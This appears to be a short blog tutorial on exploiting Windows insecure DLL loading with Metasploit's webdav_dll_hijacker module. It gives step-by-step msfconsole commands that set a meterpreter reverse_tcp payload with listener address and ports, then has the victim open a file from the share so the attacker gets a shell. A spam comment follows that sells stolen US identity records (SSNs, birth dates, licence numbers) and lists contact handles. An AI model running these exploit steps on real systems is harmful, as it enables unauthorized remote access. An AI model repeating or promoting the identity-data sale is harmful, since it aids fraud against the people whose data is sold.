This vulnerability is triggered when a vulnerable file type is opened from the server that is hosting the files.
Ususally , the user has to browse into the directory and open the file, this can be any file, even blank one with nothing inside.
The flaw is that the application launched to handle the file type will inadvertently load a DLL from the working directory , and then we got our
shell. So lets do this one.
1) open msfconsole
msf> search webdav.dll
msf> use windows/browser/webdav_dll_hijacker
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set BASENAME reports
msf> set extensions grp
msf> set LHOST 192.168.1.69
msf> set SRVHOST 192.168.1.69
msf> set LPORT 8888
msf> set SRVPORT 80
msf> set SHARENAME documents
msf> exploit
Now , go to the client and browse this directory file://192.1681.1.69/ and click on any file
Done, you have your shell
msf> sessions
Now, go to this website to see the list of all apps that are vulnerable
http://vupen.com/english/searchengine.php?keyword=insecure+library+loading
Hello Everyone !
ReplyDeleteUSA SSN Leads/Fullz available, along with Driving License/ID Number with good connectivity.
All SSN's are Tested & Verified.
**DETAILS IN LEADS/FULLZ**
->FULL NAME
->SSN
->DATE OF BIRTH
->DRIVING LICENSE NUMBER
->ADDRESS WITH ZIP
->PHONE NUMBER, EMAIL
->EMPLOYEE DETAILS
*Price for SSN lead $2
*You can ask for sample before any deal
*If you buy in bulk, will give you discount
*Sampling is just for serious buyers
->Hope for the long term business
->You can buy for your specific states too
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040